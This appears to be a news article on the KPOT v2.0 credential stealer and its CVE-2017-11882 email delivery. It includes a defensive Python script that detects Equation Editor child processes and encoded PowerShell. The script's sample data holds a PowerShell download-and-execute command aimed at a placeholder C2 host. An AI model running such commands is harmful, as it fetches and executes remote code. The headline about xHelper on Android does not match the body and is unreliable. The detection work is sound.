This Is How xHelper Reinstates Itself on Android Phones Even After Factory Reset
Last updated June 23, 2021
The KPOT stealer is a dangerous piece of malware that targets account information and other sensitive user data by monitoring and intercepting messenger apps, web browsers, email, and even VPN traffic. Having already built a successful record in the wild, its authors have updated the malware and now sell KPOT v2.0 for $100 on darknet forums. The changelog for this version is quite extensive, with the following improvements and additions being the most notable:
Proofpoint researchers have already spotted email campaigns trying to spread the new KPOT, exploiting CVE-2017-11882 through RTF documents attached to the emails. An intermediate downloader then fetches a malicious PowerShell script that carries a Base64-encoded payload. The command and control server remains the familiar HTTP one, with the responses from the C&C being encrypted.
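To show what that delivery chain looks like from the detection side, here is an added example that is not from the article or from Proofpoint's research. It scans constructed Sysmon-style process-creation events for the two stages the chain exposes: CVE-2017-11882 is the Office Equation Editor bug, so EQNEDT32.EXE spawning any child process is suspicious, and a PowerShell launch with a Base64-encoded command is decoded so the payload can be inspected. The log format, file paths and C2 hostname are assumptions made up for the example.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed events in the format: timestamp|parent image|image|command line
# The encoded command is built here so the sample is honest UTF-16LE Base64,
# which is what PowerShell's -EncodedCommand expects.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    r"2021-06-23T10:00:01|C:\Windows\explorer.exe|C:\Windows\notepad.exe|notepad.exe",
    r"2021-06-23T10:00:05|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"
    r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|EQNEDT32.EXE -Embedding",
    r"2021-06-23T10:00:06|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|"
    r"C:\Windows\System32\cmd.exe|cmd /c %TEMP%\dl.exe",
    r"2021-06-23T10:00:08|C:\Windows\System32\cmd.exe|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    "powershell -nop -w hidden -enc " + ENCODED,
    r"2021-06-23T10:00:09|C:\Windows\explorer.exe|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File C:\scripts\backup.ps1",
]
# PowerShell accepts -e, -ec, -en, -enc and the full -EncodedCommand switch.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
PS_NAMES = {"powershell.exe", "pwsh.exe"}

def parse_event(line):
    ts, parent, image, cmd = line.split("|", 3)
    return {"ts": ts, "parent": PureWindowsPath(parent).name.lower(),
            "image": PureWindowsPath(image).name.lower(), "cmd": cmd}

def decode_encoded_command(cmd):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(lines):
    """Return (timestamp, rule, detail) findings for the two chain stages."""
    findings = []
    for ev in map(parse_event, lines):
        # Word launching the Equation Editor is normal; the editor launching
        # anything else is the CVE-2017-11882 post-exploitation signal.
        if ev["parent"] == "eqnedt32.exe" and ev["image"] != "eqnedt32.exe":
            findings.append((ev["ts"], "equation-editor-child", ev["cmd"]))
        if ev["image"] in PS_NAMES:
            decoded = decode_encoded_command(ev["cmd"])
            if decoded is not None:
                findings.append((ev["ts"], "powershell-encoded-command", decoded))
    return findings

if __name__ == "__main__":
    for ts, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {detail}")
```

Only the Equation Editor's child process and the encoded PowerShell launch are reported; the legitimate Word-to-Equation-Editor spawn and the `-File` PowerShell run stay quiet.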
The information that KPOT 2.0 can exfiltrate from the infected system includes hardware info, user names, external IP, OS version, machine GUID, keyboard layouts, and a list of the installed software. By identifying what’s there, KPOT activates the required credential stealing modules that cover the following software: Chrome, Firefox, Internet Explorer, Skype, Telegram, Discord, Battle.net, Steam, Jabber. Apart from these, KPOT can also steal various cryptocurrency files, FTP client accounts, Windows credentials, and even take screenshots.
The takeaway is that particularly capable stealers like KPOT are now as cheap as $100, which makes their deployment more accessible and potentially more widespread than ever. KPOT v2.0 may be able to target a broad spectrum of applications, but it's important to remember that it all starts with you opening an unsolicited email. Don't click on links in email messages from addresses you don't recognize, don't download attachments, and don't run executables. If you don't need macros in your office suite, disable them. Finally, use an AV solution from a reputable vendor and update it regularly.